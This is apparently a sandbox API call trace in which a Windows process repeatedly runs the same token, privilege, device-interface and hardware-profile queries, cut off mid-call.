0 [0084.790] GetLastError () returned 0x3f0 [0084.790] GetCurrentProcess () returned 0xffffffff [0084.790] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.790] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.790] SetLastError (dwErrCode=0x522) [0084.790] CloseHandle (hObject=0x114) returned 1 [0084.790] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.790] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.790] GetLastError () returned 0x578 [0084.790] SetLastError (dwErrCode=0x578) [0084.790] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.790] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.790] GetCurrentThread () returned 0xfffffffe [0084.790] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.790] GetLastError () returned 0x3f0 [0084.790] GetCurrentProcess () returned 0xffffffff [0084.790] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.791] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.791] SetLastError (dwErrCode=0x522) [0084.791] CloseHandle (hObject=0x114) returned 1 [0084.791] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.791] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.791] GetLastError () returned 0x578 [0084.791] SetLastError (dwErrCode=0x578) [0084.791] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.791] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.791] GetCurrentThread () returned 0xfffffffe [0084.791] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.791] GetLastError () returned 0x3f0 [0084.791] GetCurrentProcess () returned 0xffffffff [0084.791] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.791] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.791] SetLastError (dwErrCode=0x522) [0084.791] CloseHandle (hObject=0x114) returned 1 [0084.791] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.791] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.791] GetLastError () returned 0x578 [0084.791] SetLastError (dwErrCode=0x578) [0084.791] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.791] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.791] GetCurrentThread () returned 0xfffffffe [0084.791] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.791] GetLastError () returned 0x3f0 [0084.791] GetCurrentProcess () returned 0xffffffff [0084.791] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.791] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.791] SetLastError (dwErrCode=0x522) [0084.791] CloseHandle (hObject=0x114) returned 1 [0084.791] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.791] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.791] GetLastError () returned 0x578 [0084.791] SetLastError (dwErrCode=0x578) [0084.791] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.791] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.791] GetCurrentThread () returned 0xfffffffe [0084.791] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.791] GetLastError () returned 0x3f0 [0084.791] GetCurrentProcess () returned 0xffffffff [0084.792] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.792] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.792] SetLastError (dwErrCode=0x522) [0084.792] CloseHandle (hObject=0x114) returned 1 [0084.792] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.792] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.792] GetLastError () returned 0x578 [0084.792] SetLastError (dwErrCode=0x578) [0084.792] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.792] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.792] GetCurrentThread () returned 0xfffffffe [0084.792] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.792] GetLastError () returned 0x3f0 [0084.792] GetCurrentProcess () returned 0xffffffff [0084.792] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.792] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.792] SetLastError (dwErrCode=0x522) [0084.792] CloseHandle (hObject=0x114) returned 1 [0084.792] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.792] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.792] GetLastError () returned 0x578 [0084.792] SetLastError (dwErrCode=0x578) [0084.792] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.792] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.792] GetCurrentThread () returned 0xfffffffe [0084.792] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.792] GetLastError () returned 0x3f0 [0084.792] GetCurrentProcess () returned 0xffffffff [0084.792] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.792] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.792] SetLastError (dwErrCode=0x522) [0084.792] CloseHandle (hObject=0x114) returned 1 [0084.792] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.792] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.792] GetLastError () returned 0x578 [0084.792] SetLastError (dwErrCode=0x578) [0084.792] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.792] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.792] GetCurrentThread () returned 0xfffffffe [0084.792] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.792] GetLastError () returned 0x3f0 [0084.792] GetCurrentProcess () returned 0xffffffff [0084.793] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.793] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.793] SetLastError (dwErrCode=0x522) [0084.793] CloseHandle (hObject=0x114) returned 1 [0084.793] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.793] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.793] GetLastError () returned 0x578 [0084.793] SetLastError (dwErrCode=0x578) [0084.793] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.793] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.793] GetCurrentThread () returned 0xfffffffe [0084.793] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.793] GetLastError () returned 0x3f0 [0084.793] GetCurrentProcess () returned 0xffffffff [0084.793] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.793] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.793] SetLastError (dwErrCode=0x522) [0084.793] CloseHandle (hObject=0x114) returned 1 [0084.793] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.793] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.793] GetLastError () returned 0x578 [0084.793] SetLastError (dwErrCode=0x578) [0084.793] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.793] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.793] GetCurrentThread () returned 0xfffffffe [0084.793] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.793] GetLastError () returned 0x3f0 [0084.793] GetCurrentProcess () returned 0xffffffff [0084.793] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.793] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.793] SetLastError (dwErrCode=0x522) [0084.793] CloseHandle (hObject=0x114) returned 1 [0084.793] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.793] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.793] GetLastError () returned 0x578 [0084.793] SetLastError (dwErrCode=0x578) [0084.793] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.793] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.793] GetCurrentThread () returned 0xfffffffe [0084.793] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.793] GetLastError () returned 0x3f0 [0084.793] GetCurrentProcess () returned 0xffffffff [0084.793] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.794] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.794] SetLastError (dwErrCode=0x522) [0084.794] CloseHandle (hObject=0x114) returned 1 [0084.794] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.794] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.794] GetLastError () returned 0x578 [0084.794] SetLastError (dwErrCode=0x578) [0084.794] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.794] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.794] GetCurrentThread () returned 0xfffffffe [0084.794] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.794] GetLastError () returned 0x3f0 [0084.794] GetCurrentProcess () returned 0xffffffff [0084.794] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.794] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.794] SetLastError (dwErrCode=0x522) [0084.794] CloseHandle (hObject=0x114) returned 1 [0084.794] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.794] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.794] GetLastError () returned 0x578 [0084.794] SetLastError (dwErrCode=0x578) [0084.794] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.794] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.794] GetCurrentThread () returned 0xfffffffe [0084.794] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.794] GetLastError () returned 0x3f0 [0084.794] GetCurrentProcess () returned 0xffffffff [0084.794] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.794] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.794] SetLastError (dwErrCode=0x522) [0084.794] CloseHandle (hObject=0x114) returned 1 [0084.794] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.794] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.794] GetLastError () returned 0x578 [0084.794] SetLastError (dwErrCode=0x578) [0084.794] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.794] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.794] GetCurrentThread () returned 0xfffffffe [0084.794] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.794] GetLastError () returned 0x3f0 [0084.794] GetCurrentProcess () returned 0xffffffff [0084.794] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.795] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.795] SetLastError (dwErrCode=0x522) [0084.795] CloseHandle (hObject=0x114) returned 1 [0084.795] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.795] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.795] GetLastError () returned 0x578 [0084.795] SetLastError (dwErrCode=0x578) [0084.795] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.795] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.795] GetCurrentThread () returned 0xfffffffe [0084.795] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.795] GetLastError () returned 0x3f0 [0084.795] GetCurrentProcess () returned 0xffffffff [0084.795] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.795] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.795] SetLastError (dwErrCode=0x522) [0084.795] CloseHandle (hObject=0x114) returned 1 [0084.795] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.795] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.795] GetLastError () returned 0x578 [0084.795] SetLastError (dwErrCode=0x578) [0084.795] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.795] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.795] GetCurrentThread () returned 0xfffffffe [0084.795] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.795] GetLastError () returned 0x3f0 [0084.795] GetCurrentProcess () returned 0xffffffff [0084.795] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.795] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.795] SetLastError (dwErrCode=0x522) [0084.795] CloseHandle (hObject=0x114) returned 1 [0084.795] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.795] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.795] GetLastError () returned 0x578 [0084.795] SetLastError (dwErrCode=0x578) [0084.795] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.795] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.795] GetCurrentThread () returned 0xfffffffe [0084.795] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.795] GetLastError () returned 0x3f0 [0084.795] GetCurrentProcess () returned 0xffffffff [0084.795] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.796] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.796] SetLastError (dwErrCode=0x522) [0084.796] CloseHandle (hObject=0x114) returned 1 [0084.796] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.796] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.796] GetLastError () returned 0x578 [0084.796] SetLastError (dwErrCode=0x578) [0084.796] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.796] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.796] GetCurrentThread () returned 0xfffffffe [0084.796] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.796] GetLastError () returned 0x3f0 [0084.796] GetCurrentProcess () returned 0xffffffff [0084.796] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.796] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.796] SetLastError (dwErrCode=0x522) [0084.796] CloseHandle (hObject=0x114) returned 1 [0084.796] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.796] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.796] GetLastError () returned 0x578 [0084.796] SetLastError (dwErrCode=0x578) [0084.796] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.796] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.796] GetCurrentThread () returned 0xfffffffe [0084.796] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.796] GetLastError () returned 0x3f0 [0084.796] GetCurrentProcess () returned 0xffffffff [0084.796] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.796] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.796] SetLastError (dwErrCode=0x522) [0084.796] CloseHandle (hObject=0x114) returned 1 [0084.796] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.796] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.796] GetLastError () returned 0x578 [0084.796] SetLastError (dwErrCode=0x578) [0084.796] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.796] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.796] GetCurrentThread () returned 0xfffffffe [0084.796] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.797] GetLastError () returned 0x3f0 [0084.797] GetCurrentProcess () returned 0xffffffff [0084.797] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.797] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.797] SetLastError (dwErrCode=0x522) [0084.797] CloseHandle (hObject=0x114) returned 1 [0084.797] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.797] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.797] GetLastError () returned 0x578 [0084.797] SetLastError (dwErrCode=0x578) [0084.797] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.797] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.797] GetCurrentThread () returned 0xfffffffe [0084.797] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.797] GetLastError () returned 0x3f0 [0084.797] GetCurrentProcess () returned 0xffffffff [0084.797] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.797] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.797] SetLastError (dwErrCode=0x522) [0084.797] CloseHandle (hObject=0x114) returned 1 [0084.797] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.797] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.797] GetLastError () returned 0x578 [0084.797] SetLastError (dwErrCode=0x578) [0084.797] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.797] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.797] GetCurrentThread () returned 0xfffffffe [0084.797] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.797] GetLastError () returned 0x3f0 [0084.797] GetCurrentProcess () returned 0xffffffff [0084.797] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.797] PrivilegeCheck (in: ClientToken=0x114, 